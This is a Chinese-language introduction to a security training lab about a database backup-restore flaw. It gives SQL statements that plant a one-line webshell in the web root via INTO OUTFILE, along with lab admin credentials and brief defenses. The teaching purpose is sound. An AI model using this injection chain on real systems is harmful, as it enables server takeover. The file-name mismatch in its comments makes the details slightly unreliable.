共计 635 个字符,预计需要花费 2 分钟才能阅读完成。
本文由东塔网络安全学院总结归纳
靶场介绍
数据库备份恢复漏洞靶场
今天,给大家介绍一下东塔攻防世界其中的一个靶场: 数据库备份恢复漏洞靶场 。
一、实验介绍
通过对数据库可以下载备份文件到本地,再给该文件添加 sql 代码上传来实现注入
如:
drop table if exists emlog_shell;// 如果存在 emlog_shell 表就把它删了;
create table emlog_shell(`cmd` longtext not null);// 重新创建一张表 emlog_shell,而且只有字段 cmd;
insert into emlog_shell values (““);// longtext 类型且不为空,并且插入字段值,构成一句话木马;
select cmd from emlog_shell into outfile /var/www/html/11112.php ;// 然后将 cmd 的值读出来 outfle 文件输出流输出到 /var/www/html/a.php
drop table if exists emlog_shell;// emlog_shell 表删了
注意事项,后台登录地址为:URL 中直接后面加入 /admin 进入后台
后台登录账号和密码 root ,123456
二、实验目的
1、了解验证码绕过的相关知识 2、了解后台地址扫描及其他相关漏洞资料 3、了解后台常用账户密码的利用方式
三、实验步骤
根据解题思路完成数据库备份漏洞的利用
四、防御方法
1. 禁止下载备份文件
2. 对上传的 sql 文件严格检测,过滤一些关键字,包括特殊字符等